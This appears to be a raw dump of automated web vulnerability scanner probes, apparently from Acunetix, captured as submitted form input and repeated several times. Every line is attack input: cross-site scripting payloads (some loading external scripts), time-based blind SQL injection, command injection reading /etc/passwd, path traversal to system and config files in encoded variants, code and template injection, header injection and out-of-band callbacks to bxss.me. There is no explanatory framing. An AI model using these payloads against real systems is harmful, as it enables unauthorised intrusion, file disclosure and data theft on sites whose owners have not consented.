1<img/src=">" onerror=alert(940761)>

1

"+response.write(9632314*9524830)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt%20>prompt(980659)</sCripT>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1&lt

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

\xf6<img acu onmouseover=prompt(976687) //\xf6>

1

-1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

-1)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<input autofocus onfocus=prompt(918325)>

|cat /etc/passwd#

1

-1))

${99959+99373}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

rb3LMA5C'

1

1&n933318=v982312

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

"|"ld

1some_inexistent_file_with_long_name%00.jpg

ut81Or8o'

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1_Un0DJ <ScRiPt >prompt(996046)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

GtUdFBWl'

^(#$!@#$)(()))******

1

/etc/passwd

1

testasp.vulnweb.com

'

'

1

iDxq82uq')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

JwzXpKYm'))

1

1

1

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1)

http://hitBqBiCHgXSb.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

1

file:///etc/passwd

'&dir&'

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

-1))

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

|dir

WEB-INF/web.xml

qI9Mikyb'

http://www.acunetix.tst

comments

'"

1

1

WEB-INF\web.xml

'|dir

g3TZWAfa')

1

comments/.

<!--

1

1'"()&%<ScRiPt >prompt(951158)</ScRiPt>

1

'"()&%<ScRiPt >prompt(937665)</ScRiPt>

zITMZeyw'))

../../../../../../../../../../windows/win.ini

"|dir

1

1

1

1

1_978424

1

../../../../../../../../../../boot.ini

1

1

1

1

acu7729\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7729

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux3526\xc0\xbez1\xc0\xbcz2a\x90bcxuca3526

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(917989)</ScRiPt>

1

1

................windowswin.ini

1

1

1<script>prompt(997298)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(997574)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979149></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(993566)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(927610)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964598)"></g></svg>

WEB-INF\web.xml

1<div style=width:expression(prompt(931246))>

1

1

1

1<iframe src='data:text/html

1

response.write(9041623*9709648)

1

1<body onload=prompt(977708)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905788)>

'+response.write(9041623*9709648)+'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(957681)>

1

"+response.write(9041623*9709648)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1<img/src=">" onerror=alert(964577)>

1

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<ScRiPt%20>prompt(900096)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

1

cat /etc/passwd

1

1&lt

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1

\xf6<img acu onmouseover=prompt(918273) //\xf6>

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100022+99977}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1<input autofocus onfocus=prompt(928788)>

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n980840=v941606

1some_inexistent_file_with_long_name%00.jpg

'|'ld

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

x5an4QYa'

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

HtUMrNE7')

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1_eo8Dx <ScRiPt >prompt(990066)</ScRiPt>

1

/etc/passwd

ylPtoZaT'))

1

1

'

'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

1

-1))

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitJPI9N8HjR6.bxss.me/

lI1bZgtM'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

1

'&dir&'

1

acunetix_wvs_invalid_filename

1

1

1

ZPTxGFo4')

1

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

comments

http://www.acunetix.tst

1

'"

mOW7PLFY'))

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(996636)</ScRiPt>

1

|dir

comments

1

1

<!--

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(934775)</ScRiPt>

1

'|dir

comments/.

1

../../../../../../../../../../windows/win.ini

1

1

1_977765

1

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

acu10277\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10277

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acux10404\xc0\xbez1\xc0\xbcz2a\x90bcxuca10404

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(993025)</ScRiPt>

1

1

1

1

................windowswin.ini

1<script>prompt(939835)</script>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(931956)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905910></ScRiPt>

1

1

1

1<ScRiPt >prompt(958417)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(957883)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919377)"></g></svg>

1

WEB-INF/web.xml

1<div style=width:expression(prompt(905758))>

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

response.write(9872960*9843162)

1<body onload=prompt(953858)>

1

1

1

'+response.write(9872960*9843162)+'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(908429)>

1

1

"+response.write(9872960*9843162)+"

1

1

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(978115)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(11.359),0)/*'XOR(if(now()=sysdate(),sleep(11.359),0))OR'"XOR(if(now()=sysdate(),sleep(11.359),0))OR"*/

'&cat /etc/passwd&'

1<img/src=">" onerror=alert(941118)>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(11.359)))v)/*'+(select(0)from(select(sleep(11.359)))v)+'"+(select(0)from(select(sleep(11.359)))v)+"*/

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(986494)</sCripT>

1

SomeCustomInjectedHeader:injected_by_wvs

1

-1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1&lt

1

1

-1)

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(923808) //\xf6>

1

1

1

1

-1))

${99798+99315}

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<input autofocus onfocus=prompt(984878)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n957536=v999600

'|'ld

1

Mp2er0qO'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1

1some_inexistent_file_with_long_name%00.jpg

)

r3Es35os')

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1_1Kqrz <ScRiPt >prompt(908402)</ScRiPt>

Izd5RwsT'))

1

/etc/passwd

'"()

1

testasp.vulnweb.com

'

^(#$!@#$)(()))******

1

'

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1))

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

&dir

tC4tB6Re'

1

http://hitQ9hjhxt72r.bxss.me/

1

1

acunetix_wvs_invalid_filename

'&dir&'

renatEnl')

1

file:///etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

"&dir&"

mmMEW3r0'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

http://www.acunetix.tst

|dir

'"

comments

1

1

WEB-INF/web.xml

'|dir

1

1'"()&%<ScRiPt >prompt(973902)</ScRiPt>

1

<!--

comments/.

1

1

WEB-INF\web.xml

"|dir

1

'"()&%<ScRiPt >prompt(985492)</ScRiPt>

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1_999589

1

1

1

1

../../../../../../../../../../boot.ini

1

acu7272\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7272

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux10065\xc0\xbez1\xc0\xbcz2a\x90bcxuca10065

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(962444)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(975823)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(906875)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943172></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(957072)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(967749)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972740)"></g></svg>

WEB-INF/web.xml

1

1<div style=width:expression(prompt(909123))>

WEB-INF\web.xml

1

1<iframe src='data:text/html

response.write(9376170*9901008)

1

1

'+response.write(9376170*9901008)+'

1

1<body onload=prompt(951552)>

1

1

"+response.write(9376170*9901008)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986966)>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(990036)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(999762)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<ScRiPt%20>prompt(939613)</sCripT>

cat /etc/passwd

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99426+99768}

1

-1)

-1))

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(981862) //\xf6>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

cVpkxFpZ'

'|'ld

1&n910819=v947561

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(944680)>

)

1some_inexistent_file_with_long_name%00.jpg

1

J7guPgaW')

"|"ld

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

D6PO92ee'))

^(#$!@#$)(()))******

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

testasp.vulnweb.com

1

'

-1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_fz4q7 <ScRiPt >prompt(979855)</ScRiPt>

1

1

1

"

"

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

1

http://hitmNf8lWOqpf.bxss.me/

'&dir&'

1

file:///etc/passwd

1

GRSvTd4w'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

acunetix_wvs_invalid_filename

comments

1

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

P7EMpJNE')

1

1

comments

1

http://www.acunetix.tst

|dir

WEB-INF/web.xml

1

fSP5s6yl'))

1'"()&%<ScRiPt >prompt(933766)</ScRiPt>

'"

comments/.

1

1

'|dir

<!--

WEB-INF\web.xml

1

1

'"()&%<ScRiPt >prompt(948288)</ScRiPt>

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1_991552

1

1

1

1

../../../../../../../../../../boot.ini

1

acu7782\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7782

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux3503\xc0\xbez1\xc0\xbcz2a\x90bcxuca3503

1

1

1

1<ScRiPt >prompt(949740)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(952600)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(946719)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968379></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(992901)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(933291)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924522)"></g></svg>

1

1

1<div style=width:expression(prompt(954583))>

1

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

WEB-INF\web.xml

1<body onload=prompt(913254)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983515)>

1

1

1<img src=xyz OnErRor=prompt(984026)>

1

response.write(9110625*9039760)

1

'+response.write(9110625*9039760)+'

1<img/src=">" onerror=alert(981969)>

1

&cat /etc/passwd&

1

1

1

1<ScRiPt%20>prompt(991474)</sCripT>

"+response.write(9110625*9039760)+"

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1&lt

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

\xf6<img acu onmouseover=prompt(941220) //\xf6>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

-1

1

1<input autofocus onfocus=prompt(979524)>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

${100299+99011}

1

1

-1)

<a href='http://www.acunetix.com'>website security</a>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1&n932545=v973728

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1_WlnEb <ScRiPt >prompt(929493)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

MzOsRCGW'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

urpe0KLw')

/etc/passwd

1

1

'

1

'

1

1

gGXKBoQ4'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

1

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

acunetix_wvs_invalid_filename

1

http://hitXMcFOIvuRo.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

1

1

1

YtrdPbOp'

file:///etc/passwd

1

comments

1

http://www.acunetix.tst

1

'"

/\../\../\../\../\../\../\../etc/passwd

2eHjPhhf')

1'"()&%<ScRiPt >prompt(965422)</ScRiPt>

1

comments/.

"&dir&"

|dir

1

1

<!--

1

WEB-INF/web.xml

vCblCFdg'))

'"()&%<ScRiPt >prompt(949235)</ScRiPt>

1

'|dir

1

1

1

1

WEB-INF\web.xml

1

1_925756

"|dir

1

1

1

1

acu1625\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1625

../../../../../../../../../../windows/win.ini

1

1

1

1

acux2527\xc0\xbez1\xc0\xbcz2a\x90bcxuca2527

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(992166)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(948248)</script>

1

1<ScRiPt >prompt(916744)</ScRiPt>

1

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?986422></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1<ScRiPt >prompt(962604)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(969415)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(933666)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(954746))>

1

1

1<iframe src='data:text/html

1<body onload=prompt(907822)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(998115)>

1

response.write(9770792*9460177)

1

1

1<img src=xyz OnErRor=prompt(941290)>

1

'+response.write(9770792*9460177)+'

&cat /etc/passwd&

1

1<img/src=">" onerror=alert(916668)>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9770792*9460177)+"

1<ScRiPt%20>prompt(905654)</sCripT>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1&lt

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

\xf6<img acu onmouseover=prompt(922119) //\xf6>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

1

-1

1<input autofocus onfocus=prompt(989607)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

<a href='http://www.acunetix.com'>website security</a>

1

${100310+99625}

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1&n974524=v900559

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

[url=http://www.acunetix.com]website security[/url]

1

1

1

-1))

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"|"ld

1_ZVaiS <ScRiPt >prompt(902964)</ScRiPt>

)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

X0woZHnT'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

'

1

!(()&&!|*|*|

C4KdU5LE')

1

testasp.vulnweb.com

/etc/passwd

1

"

1

'

^(#$!@#$)(()))******

1

1

XApdsZko'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitEuQABzP8gg.bxss.me/

1

||cat /etc/passwd

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

1

1

&dir

-1))

1

comments

1

1

1

TQ6IEKA9'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

'&dir&'

'"

1'"()&%<ScRiPt >prompt(984001)</ScRiPt>

comments/.

file:///etc/passwd

1

1

1

KUvAaRUf')

"&dir&"

1

'"()&%<ScRiPt >prompt(912092)</ScRiPt>

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

xMB6ZMuW'))

|dir

1_959355

WEB-INF/web.xml

1

1

1

1

1

'|dir

1

WEB-INF\web.xml

acu2428\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2428

1

1

"|dir

acux6879\xc0\xbez1\xc0\xbcz2a\x90bcxuca6879

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(938117)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(931627)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(991117)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921996></ScRiPt>

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(909842)</ScRiPt>

1

1<video><source onerror="javascript:prompt(928587)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959347)"></g></svg>

1

